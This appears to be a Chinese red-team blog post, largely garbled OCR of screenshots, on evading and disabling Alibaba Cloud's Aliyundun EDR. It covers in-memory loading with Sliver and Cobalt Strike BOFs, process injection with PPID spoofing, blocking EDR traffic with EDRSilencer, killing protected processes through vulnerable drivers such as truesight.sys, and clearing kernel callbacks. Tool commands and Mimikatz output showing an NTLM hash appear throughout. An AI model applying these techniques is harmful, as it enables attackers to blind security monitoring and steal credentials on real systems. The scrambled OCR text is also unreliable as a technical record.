进程派生 - Windows_进程白基线模型

尝试绕过思路：

利用当前进程执行功能

利用白名单进程链绕过

致盲/终结终端监控采集

内存加载 - C#

使用 Windows 提供的 API 动态加载 .NET 的 CLR

，将希望运行的EXE文件内容直接注入到 CLR 的执行环境中，避免了

文件落地操作

以及

新进程的产生

，从而增强了隐蔽性。

例：Sliver自带功能模块 [server] sliver > execute-assembly -i，代码使用

go-clr

库

天天天天天

HOSTNAME:WORKGROUP

USERNAME:IZQJTTMOLTHVURZ$

PASSWORD:[NULL]

AUTHENTICATION ID

72(00000000:00051772)

:0;51772(

[*]

SESSION

FROM 0

IZQJTTM0LTHVURZ$

[*]USERNAME

] LOGONDOMAIN

LOGONSERVER

:1601/01/01 08:00:00

OGONTIME

SID

*.*

WDIGEST

HOSTNAME:WORKGROUP

USERNAME :IZQJTTMOLTHVURZ$

PASSWORD:[NULL]

SLIVER

(DULL MOVE)

EXECUTE-ASSEMBLY -I /ROOT/SHARPKATZ.EXE

[SERVER]

0:ROOT@IZBP1FR9I8FUW8E8EZUSQ2Z:~*

[SLIVER]

精准驾驶

运同

最近十五分钟

提示

日志条数:0

原始日志

统计图表

部面乐示:

意挥当前页

全路

批量异常转事件

导出CSV

ENHANCE_CONTENT

共0亲记录

内存加载 - BOF

BOF文件是由C/C++编译而来的文件，可在Beacon进程中动态加载并执行内部的Beacon API和Win32 API函数，

无文件执行

与

无新进程创建

的特性更加符合OPSEC的原则。

例：Cobalt Strike 4.1开始增加

Beacon Object Files (BOFs)功能

代替cmd /c 执行命令减少进程链

代替进程派生、进程注入和进程反射DLL的内存artifacts

C:\USERS\ADNINISTRATOR\DESKTOP\SA\IPCONFIG\IPCONFIG.X64.0

[02/24 15:34:31]

NLINE-EXECUTE C:

BEACON

[02/24 15:34:31]

IPCONFIG-X64.0

BEACON TO INLINE-EXECUTE C:\USERSLADMINISTRATOR (DESKTOP(SA\IPCONFIG\IPG

TASKED

[+]

[02/24 15:34:31]

HONE, SENT: 3209 BYTES

HOST

CALLED

[+] RECEIVED OUTPUT:

[02/24 15:34:31]

[16E35B41-3F31-4A0E-8C88-D3A57A4D0959

ETHERNET

RED HAT VIRTIO ETHERNET ADAPTER

00-16-3E-3A-99-D4

172.16.195.13

IZGJTTMOLTHVURZ

HOSTNAME:

DNS SUFFIX:

100.100.2.136

DNS SERVER:

100.100.2.138

E C:\USERS\ADNISTRATOR\DESKTOP|SALWHOANI|WHOANI.X64.X64.O

[02/24 15:34:57] B

7]BEACON

E-EXECUTE

INISTRATOR\DESKTOP|SA\WHOANI\WHOANI.X64.O

[02/24 15:34:57]

TASKE

BEACON TO INLINE-EXECUTE C: / USERS ADMINE

[02/24 15:34:57]

HONE, SENT:6906 BYTES

HOST CALLED

[02/24 15:34:57]

[+]

RECEIVED OUTPUT:

SID

USERNANE

062776-1611543829-3051162376-500

IZQJTTHOLTHVURZ\AD INISTRATOR

本册

121.40.173 180

异常数据(O)

日志条数:0

感开

统计图表

原始日志

索寸字牌

每年显示:

全进

批量并穿转事件

共0条记录

DEST ENTITY

https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_main.htm

进程注入+断链 - DLL/EXE

产生一个新的牺牲过程，通过反射将 DLL/EXE转化成Shellcode注入到目标进程的内存中，从而实现

文件不落地内存执行。

例：Sliver自带功能模块 [server] sliver > sideload，代码使用

Donut

库

VirtualAllocEx -> WriteProcessMemory -> VirtualProtectEx -> CreateRemoteThread

直接调用会产生额外傀儡进程从而触发进程派生告警，结合

PPID Spoofing+白名单绕过

进行父进程欺骗规避告警

PPID Spoofing核心：Windows 提供的扩展属性，允许开发者在创建新进程时指定其父进程。调用CreateProcess 函数时设置PROC_THREAD_ATTRIBUTE_PARENT_PROCESS属性来实现 PPID 欺骗

(DULL MOVE)

'EXIT"

FILES\WINDOWS DEFENDER\MPCMDRUN.EX

SLIVER

4452

ATZ.EXE

C:\PROGRAM

-A

SIDELOAD

[SERVER]

-SCAN

SCANTYPE

PPIC

D-

[*]OUTPUT:

MIMIKATZ 2.2.0 (X64) #19041 SEP 19 2022 17:44:08

.####

"A LA VIE,A L'AMOUR''-(OE.EO)

井林/ | | |

/*** BENIAMIN DELPY "GENTILKIWI'(BENJAMINGGENTILKIWI.COM )

#####

>HTTPS://BLOG.GENTILKIWI.COM/MIMIKATZ

###A#

VINCENT LE TOUX

(VINCENT.LETOUX@GMAIL.COM

#####

> HTTPS://PINGCASTLE.COM / HTTPS://MYSMARTLOGON.COM *

MIMIKATZ(COMMANDLINE)# COFFEE

MIMIKATZ(COMMANDLINE)# EXIT

BYE!

1 02-2517:48:57

1740476939

26.73.235.95

CCP:N/A

ALIUID:1125189980703649

BASELINE_KEY1 HASH: 402184F9C95C76E37C0F545FE70617A7

{"3120":""]

CMD CHAIN INDEX:P0

近一小时

异常数据(0)

日志条数:0

统计国表

每页显示:

全选

选择当前页

批量并宗钙事件

导出CSY

共口条记录

致盲监控 -

WFP拦截

WFP是内置在Windows中的强大框架，用于创建网络过滤和安全应用程序。它为开发人员提供了API，以根据各种标准（例如IP地址，端口，协议和应用程序）定义自定义规则以监视，阻止或修改网络流量。

利用WFP API可以阻止

运行终端监控程序进程

的出站流量，限制其通信、数据上报

PID

PATH

RESULT

PROCESS NAME

DETAIL

OPERATION

IZQJTTM01THVURZ:49691 -> 100.100.30.25:HTTP

STARTIME: 4467152, ENDT..

2044 '

LENGTH: 2294,

SUCCESS

ALIYUNDUN.EXE

TCP SEND

2044

LENGTH:958,

STARTIME: 4467167, ENDTI...

SUCCBSS

IZQJTTM01THVURZ:49691 -> 100.100.30.25:HTTP

TCP SEND

ALIYUNDUN.EXE

京

23:1..

SUCCBSS

IZQJTTM01THVURZ:49691 -> 100.30.30.25:HTTP

TCP SEND

2044

LENGTH: 970, STARTIME: 4467210, ENDTI...

ALIYUNDUN.EXE

23:1...

LENGTH: 946, STARTIME: 4467310, ENDTI...

SUCCBSS

2044

IZQJTTMO1THVURZ:49691 -> 100.100.30.25:HTTP

TCF

CHCHC

ALIYUNDUN.EXE

SEND

23:1.

2044

IZQJTTM01THVURZ:49691 -> 100.100.30.25:HTTP

SUCCESS

ALIYUNDUN.EXE

LENGTH: 10, SEQNUM: 0, CONNID: 0

TCP

RECEIVE

4467347, ENDTIME..

2044

IZQJTTM01THVURZ:49691 -> 100.100.30.25:HTTP

SUCCESS

23:1

TCP

LENGTH: 6, STARTIME:

ALIYUNDUN.EXE

SEND

STARTIME: 4467409,

2044

23:1

SUCCBSS

LENGTH:970.

IZQJTTM01THVURZ:49691 -> 100.100.30.25:HTTP

ALIYUNDUN.OXE

ENDTI..

TCP SEND

23:1

STARTIME:4467509

2044

IZQJTTM01THVURZ:49691 -> 100.30.30.25:HTTP

SUCCESS

LENGTH:946.

ALIYUNDUN.EXE

TCP SEND

ONDTI..

23:1

1300

M:ALIYUN_ASSIST_SERVICE.EXE

IZQJTTM01THVURZ:55264 -> 100.100.45.106:HTTP

SUCCBS8

TCP CONNECT

MSS:1440, SACKOPT:1,

LENGTH:0.

IZQJTTMO1THVURZ:55264 ->

23:1

100.100.45.106:HTTP

1300

STARTIME: 4469113, ENDTI...

SUCCESS

TCP

LENGTH:321

SEND

ME ALIYUN ASSIST SERVICE.EXE

23:1

IZQJTTM01THVURZ:55264 -> 100.100.45.106:HTTP

SEQNUN:0, CONNID:0

1300

SUCCBSS

LENGTH:335,

TCP RECEIVE

W:ALIYUN ASSIST SERVICE.EXE

选择管理员:WINDOWSPOWERSHELL

PS C:\USERS\ADMINISTRATOR\DESKTOP>

ES (X86)(ALIBABA(AEGIS(AEGIS CLIENT LAEGIS 12 46/ALIIIIUNDUN EXE"

\EDRSILENCER.EXE BLOCK "C:\PROGRAM FILES (X86)\

ADDED WFP FILTER FOR "C:\PR

ILES

IPROGRAM

(X86/(ALIBABALAASIS)ABGIS-CLIENT)AESIS-12 46(ALIYUNDUN.EXE" (PILTER ID: 66593, IPV4 LAYER)

ADDED WFP FILTER FOR "C:\P

(FILTER ID:66594,IPV6 LAYER).

FILES (X86)\ALIBALAEGIS LAEGIS_CLIENT(AEGIS_12 46\ALIYUNDUN.EXE"

C:IPROGRAM

PS C:\USERS\ADMINISTRATOR\DESKTOP>

1300

23:1.. 1.. 1...

IZQITTM01THVURZ:55274 -> 100.100.45.106:HTTP

LENGTH: 0, MSS: 1440,

SUCCESS

TCP CONNEOT

L ALIYUN_ASSIST_SORVICO.OXE

SACKOPT:1,TSO...

1300 至TCP

23:1... I ALIYUN_ASSIST_SERVICE.EXE

SUCCESS

IZQJTTM01THVURZ:55274 -> 100.100.45.106:HTTP

LENGTH:321

, STARTIME: 4481235, ENDTI...

SEND

SUCC8SS

1300

SEQNUM: 0, CONNID:0

LENGTH:336,

IZQJTTM01THVURZ:55274 -> 100.100.45.106:HTTP

23:1... I ALIYUN ASSIST SERVICE.EXE

TCP RECEIVE

1300

SUCCBSS

IZQJTTM01THVURZ:55274 -> 100.100.45.106:HTTP

I ALIVUN ASSISY SAYVICA AVE

CONNID: 0

0元

LENGTH:Q

2044

SUCCB38

ALIYUNDUN.EXE

IZQJTTM01THVURZ:55279 -> 100.100.30.25:HTTP

TCP DISCONNEOT

CONNID:

LENGTH:O

2044

SUCCBSS

IZQJTTMO1THVURZ:55280 -> 100.100.45.131:HTTP

TCP DISCONNECT

ALIYUNDUN.EXE

CONNID:

2044

SUCCE88

IZQJTTMO1THVURZ:55281 一> 100.100.103.52:HTTP

LENGTH:

TCP DISCONNECT

CONNID:

ALIYUNDUN.EXE

2044

IZQJTTM01THVURZ:55282 -> 100.100.32.65:HTTP

TCP DISCONNECT

SUCCBSS

CONNID:

LENGTH:

ALIYUNDUN.OXE

2044

LENGTH:0.

IZQJTTMOLTHVURZ:55283 -> 106.11.248.209:HTTP

SUCCBSS

TCP DISCONNECT

ALIYUNDUN.EXE

CONNID:

2044

SUCCESS

IZQJTTM01THVUR2:55284 -> 100.100.30.25:HTTP

LENGTH:0.

TCP DISCONNECT

ALIYUNDUN.EXE

CONNID:

LENGTH: 0, MSS: 1440, SACKOPT: 1, TSO...

SUCCESS

IZQJTTMO1THVURZ:55286 -> 100.100.45.106:HTTP

1300

CONNEOT

LENGTH: 321, STARTIME: 4486771, ENDTI...

SUCCBS8

IZQJTTMOLTHVURZ:55286 -> 100.100.45.106:HTTP

TCF

SEND

L1YUN ASSIST SORVICE EXE

1300

SUCCBSS

IZQJTTM01THVURZ:55286 -> 100.100.45.106:HTTP

LENGTH:335,

)

RECEIVE

SEQNUM:

17UN ASSIST SERVICE.EXO

T1059-COMMAND AND

T1543.00-CREATE OR

T1057-PROCESS DISCOVERY

SCRIPTING INTERPRETER

MODIFY SYSTEM PROCESS

PROCESS DISCOVERY

EXECUTION

PRIVILEGE ESCALATION

EDRSILENCER UTILIZES WINDOWS

EDRSILENCER CHECKS FOR

EXECUTE EDRSILENCER USING

FILTERING PROGRAM AND ADDS A

RUNNING EDR PROCESS

PRE-DEFINED ARGUMENTS

FILTER FOR THE EDR PROCESS TO

PREVENT OUTBOUND CONNECTIONS

T1562.001-IMPAIR DEFENSES:

DISABLE OR MODIFY TOOLS

T1569.0O2-NETWORK TRAFFIC FILTERING

IMPACT

T1498-NETWORK DENIAL OF SERVICE

T1499-ENDPOINT DENIAL OF SERVICE

EDR PROGRAMS UNABLE TO SEND

ALERTS,TELEMETRY DATA AND

OTHER INFORMATION,REDUCING

EFFECTIVENESS

https://github.com/netero1010/EDRSilencer

致盲监控 - BYOVD Kill进程

通常EDR等产品将其用户态服务初始化为受保护的服务，受保护的服务初始化是由驱动程序完成的，这个内核驱动程序

不允许停止、禁用这个受保护服务以及不允许修改它的注册表项启动类型来关闭

，也就是说即使用户提权到System也无法关闭Aliyundun相关监控进程。

利用有Kill 进程功能的驱动，

有这种功能的驱动常见于杀软/EDR 的驱动、外设驱动、游戏反作弊的驱动等等

truesight.sys

缺缺缺缺缺缺缺缺缺缺缺缺

5060

CHRONE.EXE

C:\USERS\LU-0CQ237NOHLWULC59\DOWNLOADS>TRUESIGHTKILLER.EXE -P 3492

15416

CHROME.EXE

WELCOME TO EDR/AV KILLER USING TRUESIGHT DRIVER!

17576

OOWERSHELL.EXE

THIS IS A POC,USE IT AT YOUR OWM RISK!

17564

CONHOST.EXE

CREATING SERVICE:TRUESIGHT

996

OOWERSHE11.EXE

FULL PATH:C:\USERS\LU-0CQ237NOHLWULE59C\DOWNLOADS(TRUESIGHT.SYS

6632

OONHOST.EXE

DRIVER LOADED SUCCESSFUILY!

9108

CMD.EXE

PROCESS NAME:ALIDETECT.EXE

17604

CONHOST.EXE

PROCESS NAME:ALIDETECT.EXE

11780

CHRONE.EXE

TERMINATING PID:3492

8028

CMD.EXE

CHECKING IF PROCESS NAME:ALIDETECT.EXE IS RUNNING

6572

CONHOST,EXE

PROCESS NAME:

11456

FRUESIGHTKILLER.EXE

12800誓缺

USERS\LU-0CG237NOHLWULC59C\DOWNLOADS>

TASKLIST.EXE

HANDENDSEGG\LU-DCQ237NOHLOULCE9432 WINDEREN. TASKLIST /SVCLFINDSTR LEL

MIMIKATZ 2.2.0 X64(OE.EO)

SSP

PS C:\USERS\LU-0CQ237NOHLWULC59C\DOWMLOADS) TASKLIST /SVC\FINDSTR A1I

CRECMAN

1472 ALIYUNEDSAGENT

EDSAGENT.EXE

3688 ALIYUNAPPCENTERSERVICE

EPPCENTER_SERYICE.EXE

0:457140 (00000000:000619B4)

AUTHENTICATION ID

3716 A1IYUNNETRD

NETRD.EXE

INTERACTIVE FROM 1

3992 ALIYUNSERVICE

ALIYUN ASSIST SERVICE.EXE

LU-0CG237NOHLWULC59C

USER NAME

ALIBABA CLOUD WORKSPACE_C

7044???

IZERX53Z6CQ4Y9Z

DOMAIN

ALIYUNDUNUPDATE.EXE

3296 ALIBABA SECURITY AEGIS UPDATE SERVICE

IZERX53Z6CQ4Y9Z

LOGON SERVER

3492 7?

ALIDETECT.EXE

2024/11/26 10:45:43

LOGON TIME

7592 A1IBABA SECURITY AEGIS DETECT SERVICE

ALIYUNBUN.EXE

S-1-5-21-1581715633-474844419-1564946924-1001

SID

A1INETFILTER.EXE

5012??

MSY

PS C:\USERS\LU-0CQ237NOHLMULE59C\DOWNLOADS> TASKLIST /SVCLFINDSTR ALI

[00000003]

PRIMARY

1472 ALIYUNEDSAGENT

ODSAGENT.EXE

*USERNAME

LU-0CQ237NOHLWULC59C

3688 ALIYUNAPPCENTERSERVI CE

APPCENTER SERVICE.EXE

IZERX53Z6CQ4Y9Z

DOMAIN

3716 A1IYUNNETRD

HETRDEXE

NTLM

F0CABDEC7D800693A6EB601787A7126A

3992 A1IYUNSERVICE

ALIYUN ASSIST SERVICE.EXE

9A39CF33C0866019919FBD90C50E799250AA847C

SHA1

A1IBABA C1OUD_WORKSPACE_C

70447?

TSPKG

ALIYUNDUNUPDATE.EXE

3296 ALIBABA SECURITY AEGIS UPDATE SERVICE

WDIGEST

ALIYUNDUN.EXE

7592 ALIBABA SECURITY AEGIS DETECT SERVICE

USERNAME:LU-0CG237NOHLWULC59C

*USE

ALINETFILTER.EXE

5012 7?

DOMAIN :IZERX53Z6C04Y9Z

近期，火绒威胁情报中心监测到一批相对更加活跃的“银狐”系列变种木马，火绒安全工程师第一时间提取样本进行分析。分析中发现样本具有检测沙箱和杀毒软件的行为，还会下载 TrueSightKiller 驱动关闭杀软，同时下载创建计划任务的 Shellcode 实现持久化，最终下载后门模块实现远程控制。

mhyprot2.sys

2022年8月，Trend Micro 公司发现有恶意软件利用“mhyprot2.sys”

驱动

程序的漏洞来杀死防病毒软件，从而感染用户电脑

终结监控 - BYOVD 永久关闭

AliyunDun通过注册以下内核回调函数来保护自己

●

AliSecGuard64_10.sys 注册了 PsSetCreateProcessNotifyRoutine 回调函数，可以对线程活动的监控

●

AliSecGuard64_10.sys 注册了 ObRegisterCallbacks 回调函数，

可以阻止对自身调试/分析

●

AliSecGuard64_10.sys 注册了 CmRegisterCallback 回调函数，用于监控注册表的操作

●

AliSecGuard.sys: 注册了多个 MiniFilter 实例，用于自身文件的保护

利用任意地址读写的驱动，

来清除内核中杀软驱动注册的回调函数，从而关闭杀软保护能力，例如普通用户权限关闭Aliyundun monitor进程、更改注册表实现重启永不启动Aliyundun

2016 M1CROSORT CORPORATION.保留所有收利.

管理员:C:WINDOWS/SYSTEM32/CMD.EXE

UNIC /NAMESPACE:\\ROOT\LICROSOFT YINDOWS\DEFENDER

PS C:\USERS\ADMINISTRATOR>

ATHC:\WINDOWS(TEMP

[:]:49683

LISTENING

[::]:0

584

UDP

执行(MSFT_MPPREFERENCE)->ADDO)

0.0.0.0:123

应用程序工具

1052

方法执行成功.

注册表输银器

主页

共享

文件

PS C:\USERS\ADMINISTRATOR>

YHIC/NAME

ROCESS DULL MOVE.OXE

统报(E)

文件(日)

查看(V) 收藏夹(A)

帮助(H)

个

>ADDO

执行(MSFT U

SERVICES

数据

类型

名称

方法执行成功

图任务管理器

ATARANA.ANAUAUA-ALA-ALLATARANDATARANDATAR

.NET CLR DATA

REG_SZ

(默认)

(敬值未设置)

PS C:\USERS

文件(月选项(O)

查石(V)

NET CLR NETWORKING

REG SZ

ALIBABA SECURITY AEGIS DETECT SERVICE

DESCRIPTION

NET CLR NETWORKING 4.0.0

进程性能用户详细信息服务

REG SZ

ALIBABA SECURITY AEGIS DETECT SERVICE

DISPLAYNAME

NET DATA PROVIDER FOR ORACLE

REG DWORD

婴 ERRORCONTROL

OX00000000(0)

用户名

CPU

名称

PID

状态

NET DATA PROVIDER FOR SQLSERVER

80 510100 00 00 00 00 00 00 00 20 20 0...

REG BINARY

FAILUREACTIONS

NET MEMORY CACHE 4.0

正在运行

1208

SYSTEM

ALIYUNDUN.EXE

REG EXPAND SZ

C:/PROGRAM FILES (X86)/ALIBA/AEGIS/AEGIS/AEGIS...

赔骗值时出给

正在运行

2144

SYSTEM

ALIYUNDUNMONITOR....

REG SZ

AB OBJECTNAME

LOCALSYSTEM

SVSTEM

正在运行

832

STAR START

REG DWORD

OX00000002(2)

888

无法编辑START写该信的新内容时出错.

正在运行

SYSTEM

REG DWORD

OX00000010(16)

正在运行

888888888888888

REG DWORD

WOW64

OX00000001(1)

正在运行

中 CHSLME.EXE

ADMINISTR....

确定

正在运行

3924

CMD.EXE

ACPIPAGR

正在运行

3360

ACPIPMI

正在运行

1528

CONHOST.EXE

ACPITIME

正在运行

368

SYSTEM

ADOVMPPACKAGE

正在运行

SYSTEM

448

ADP80XX

正在运行

SYSTEM

2576

ADSI

正在运行

DWM-1

836

AFD

正在运行

DWM-2

1408

AHCACHO

正在运行

3896

ADMINISTR...

AUROUTER

正在运行

2408

SYSTEM

B LOGENUL.EXE

ALG

正在运行

SYSTEM

ALIBABA SECURITY AEGIS DETECT SERVICE

3964

正在运行

NETWOR....

MPCMDRUN.EXE

ALIBABA SECURITY AEGIS UPDATE SERVICE

出

正在运行

4264

ADMINISTR...

MSASCUI.EXE

注册表编辑器

帮助(H)

文件(F)

收藏夹(A)

编辑(E)查看(V)

名称

类型

SERVICES

数据

NET CLR DATA

(默认)

(数值未设置)

REG SZ

NET CLR NETWORKING

REG SZ

ALIBABA SECURITY AEQIS DETECT SERVICE

DESCRIPTION

NET CLR NETWORKING 4.0.0

ALIBABA SECURITY AEGIS DETECT SERVICE

DISPLAYNAME

REG SZ

NET DATA PROVIDER FOR ORACLE

OX00000000(0)

WERRORCONTROL

REG DWORD

.NET DATA PROVIDER FOR SQLSERVER

FAILUREACTIONS

REG BINARY

80 51 00 00 00 00 00 00 00 00 00 20 00 0...

NET MEMORY CACHE 4.0

REG EXPAND SZ

C:/PROGRAM FILES (X86)/ALIBABA/AEGIS/AEGIS...

LMAGEPATH

NETFRAMEWORK

1394OHCI

REG DWORD

OX00000000(0)

START

3WARE

ACPI

选择管理员:C:/WINDOWS

SYSTEM32\CMD.EXE

ACPIDEV

ACPIEX

PREOPERATION:WDFILTER.SYS [CLEAR]

PROCESS

PROCESS PREOPERATION:WIN32KFULL.SYS

ACPIPAGR

ACPIPMI

ACPITIME

PREOPERATION:FILEINFO.SYS

PROCESS

ADOVMPPACKAGE

PROCESS PREOPERATION:WIN32KFULL.SYS

ADP80XX

ADSI

PREOPERATION:ALISECGUARD64_10.SYS [CLEAR]

THREAD

AFD

THREAD PREOPERATION:WIN32KFULL.SYS

AHCACHE

AJROUTER

PREOPERATION:FILEINFO.SYS

HREAD

ALG

THREAD PREOPERATION:WIN32KFULL.SYS

ALIBABA SECURITY AEGIS

ALISECGUARD

ALIWINUTILDRY

ALIYUNSERVICE

AMDK8

[CLEAR ALL BELOW]

WDFILTER.SYS

AMDPPM

REGISTRY.SYS

AMDSATA

A1ISECGUARD64_10.SYS

AMDSBS

NTOSKRN1.EXE

AMDXATA

WIN32KFUL1.SYS

APPLD

计算机\HKEY LOCAL MACHINE\SYSTEM\CURREN

若有收获，就点个赞吧